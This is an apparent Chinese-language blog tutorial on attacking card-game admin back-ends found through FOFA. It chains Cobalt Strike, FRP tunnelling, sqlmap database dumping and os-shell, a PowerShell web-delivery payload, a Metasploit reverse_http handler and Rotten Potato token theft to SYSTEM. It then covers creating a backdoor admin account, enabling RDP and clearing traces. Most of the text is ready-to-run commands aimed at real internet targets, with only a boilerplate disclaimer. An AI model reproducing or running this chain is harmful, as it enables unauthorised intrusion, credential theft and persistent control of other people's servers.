frp过来cs上线一起打牌吧
字数 970 2025-08-15 21:32:18
CS4.0与FRP内网穿透联合渗透实战教程
免责声明
本文提及的安全环境、工具和方法等仅供安全研究及教学用途,禁止非法使用!请在24小时内删除相关测试数据!
前期准备
1. Cobalt Strike 4.0服务端搭建
- 下载CS4.0安装包并上传至服务器(示例使用阿里云)
- 解压安装包后,为teamserver文件添加执行权限:
chmod 777 teamserver - 启动CS服务端:
./teamserver [阿里云服务器IP] [密码] - 客户端连接:在本地电脑或虚拟机上执行bat文件,输入服务器IP和密码连接
2. FRP内网穿透配置
- 下载FRP压缩包并上传服务器解压
- 修改服务端配置文件
frps.ini:[common] bind_port = 4444 - 启动FRP服务端:
./frps -c frps.ini - 在Kali中配置
frpc.ini并启动客户端
后台启动命令:
服务端:
nohup ./frps -c frps.ini >/dev/null 2>&1 &
客户端:
nohup ./frpc -c frpc.ini >/dev/null 2>&1 &
渗透测试实战
1. 目标识别与信息收集
使用FOFA搜索引擎查找目标:
body="qipai后台管理系统" && title=="后台登录"
2. SQL注入利用
- 抓取登录数据包保存为
post.txt - 使用SQLMap进行注入:
# 获取数据库名 sqlmap -r post.txt --dbs # 获取指定数据库表名 sqlmap -r post.txt -D RYPlatformManagerDB --tables # 获取表字段 sqlmap -r post.txt -D RYPlatformManagerDB -T dbo.Base_Users --columns # 导出表数据 sqlmap -r post.txt -D RYPlatformManagerDB -T dbo.Base_Users --dump - 破解MD5加密密码或使用弱密码尝试登录
3. 获取交互式Shell
- 通过SQLMap获取os-shell:
sqlmap -r post.txt --os-shell - 在CS中选择"攻击-钓鱼-scripted WEB Delivery"生成PowerShell命令
- 将生成的PS命令粘贴到os-shell中执行
4. 会话传递与权限提升
-
CS到MSF会话传递:
- 确保FRP服务端和客户端已启动
- 在Kali中启动MSF监听:
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_http set LHOST 127.0.0.1 set LPORT 1234 run - 在CS中添加对应监听器并迁移会话
-
权限提升(烂土豆提权):
# 上传提权工具 meterpreter > upload /root/potato.exe C:\\Users\\Public # 切换目录 meterpreter > cd C:\\Users\\Public # 查看令牌 meterpreter > use incognito meterpreter > list_tokens -u # 执行提权 meterpreter > execute -cH -f ./potato.exe # 窃取SYSTEM令牌 meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" meterpreter > getuid
5. 后渗透操作
- 创建管理员用户:
net user [username] [password] /add net localgroup administrators [username] /add - 开启远程桌面:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f - 清理痕迹后关机
技术要点总结
- 联合工具链使用:CS4.0 + FRP + MSF + SQLMap
- 内网穿透技术:通过FRP实现本地到公网的端口映射
- 权限提升技术:利用MS16-075漏洞(烂土豆提权)
- 横向移动技术:从Web渗透到系统权限获取的全过程
- 痕迹清理:操作完成后清除日志等痕迹
注意事项
- 所有操作应在授权范围内进行
- 测试完成后及时清理测试数据
- 提权操作可能对系统稳定性造成影响
- RDP开启可能触发安全警报
工具获取
文中使用到的工具可通过指定渠道获取(此处省略具体获取方式)。
本教程详细记录了从信息收集到获取系统权限的全过程,重点展示了多种安全工具的联合使用方法和权限提升技术。请务必遵守法律法规,仅将此类知识用于合法授权的安全测试和防御研究。